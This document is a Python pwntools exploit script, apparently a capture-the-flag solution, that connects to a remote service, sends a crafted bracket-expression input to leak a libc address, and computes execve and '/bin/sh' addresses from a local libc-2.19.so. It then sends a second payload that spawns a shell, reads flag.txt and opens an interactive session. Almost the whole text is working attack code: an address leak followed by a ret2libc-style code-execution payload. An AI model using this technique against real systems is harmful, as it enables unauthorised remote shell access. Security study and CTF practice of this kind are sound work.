# -*- coding: utf-8 -*-
# Third-party dependency: the `pwn` module (pwntools) supplies connect(), ELF()
# and the tube methods used throughout this script.
import pwn
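def unsign(address):
    """Parse *address* as an int and map negative values into the unsigned 32-bit range.

    The remote reply is presumably printed as a signed 32-bit value — TODO confirm;
    anything below zero is shifted by 2**32 so it can be used as an address.
    Values that are already non-negative (including 0) are returned unchanged;
    the original `> 0` test wrongly turned 0 into 2**32.

    Args:
        address: int, str or bytes accepted by int(); surrounding whitespace
            (e.g. the trailing newline from recvline()) is tolerated by int().

    Returns:
        int in [0, 2**32) for inputs in [-2**32, 2**32); larger inputs pass through.

    Raises:
        ValueError: if *address* is not an integer literal.
    """
    value = int(address)
    return value if value >= 0 else value + 2**32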
# Open the connection to the challenge service; everything below talks through this tube.
c = pwn.connect('h4x.0x04.net', 1337)

# First request: the server's reply line is parsed as an integer by unsign().
# What the bracket pattern means to the remote parser is not visible here.
libc_hack = '(' * 31 + '+' + '((0+(((+' + 35 * ')'
c.sendline(libc_hack)
libc_adr = c.recvline()
libc_adr = unsign(libc_adr)  # int() on the raw line; a non-numeric reply raises ValueError

# Symbol offsets come from a local libc-2.19.so; they only line up with the remote
# process if it runs the same build (presumably it does — not verifiable here).
libc_local_pwned = pwn.ELF('libc-2.19.so')
libc_start_pos = libc_local_pwned.symbols['__libc_start_main']
execve_pos = libc_local_pwned.symbols['execve']
binsh_pos = list(libc_local_pwned.search('/bin/sh'))[0]  # first hit only; IndexError if absent

# From the server we extracted the address of __libc_start_main shifted by 243
libc_server = libc_adr - 243 - libc_start_pos
execve_server = libc_server + execve_pos
binsh_server = libc_server + binsh_pos
# Re-wrap into the unsigned 32-bit range in case the subtraction above went negative.
execve_server = unsign(execve_server)
binsh_server = unsign(binsh_server)

# Second request: five lines of the same bracket frame, each around one number.
# Sent with a single sendline(), which appends its own newline after the final '\n'.
shellhack = '(' * 31 + '+' + '(((+(((' + str(0) + ')' * 35 + '\n'
shellhack += '(' * 31 + '+' + '(((+((' + str(0) + ')' * 34 + '\n'
shellhack += '(' * 31 + '+' + '(((+(' + str(binsh_server) + ')' * 33 + '\n'
shellhack += '(' * 31 + '+' + '(((+' + str(0) + ')' * 32 + '\n'
shellhack += '(' * 31 + '+' + '(((' + str(execve_server) + ')' * 33 + '\n'
c.sendline(shellhack)
c.sendline('cat flag.txt\n')  # likewise ends in two newlines: the explicit '\n' plus sendline's own
# Hand the session over to the terminal; returns when the connection closes.
c.interactive()